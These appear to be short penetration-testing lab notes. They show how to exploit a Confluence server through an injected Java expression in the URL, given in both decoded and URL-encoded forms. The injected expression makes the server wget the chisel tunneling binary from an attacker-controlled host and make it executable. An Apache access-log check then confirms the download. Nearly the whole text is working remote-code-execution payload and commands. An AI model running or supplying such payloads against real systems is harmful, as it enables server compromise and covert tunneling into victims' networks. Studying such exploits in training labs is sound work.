USING CHISEL for DPI(Deep packet Inspection):

sudo cp $(which chisel) /var/www/html/

sudo systemctl start apache2

Building wget command:

As before, we can modify the specific parts of the URL-encoded RCE payload that you need to, rather than trying to build a new payload from scratch, to avoid formatting difficulties.

Url decoded for confluence1 webserver:

curl http://192.168.50.63:8090/${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('bash','-c','wget 192.168.118.4/chisel -O /tmp/chisel && chmod +x /tmp/chisel').start()")}/

curl <http://192.168.50.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27wget%20192.168.118.4/chisel%20-O%20/tmp/chisel%20%26%26%20chmod%20%2Bx%20/tmp/chisel%27%29.start%28%29%22%29%7D/>

This command will make sure to get chisel to confluence1.

tail -f /var/log/apache2/access.log

confirmation to see chisel is downloaded by confluence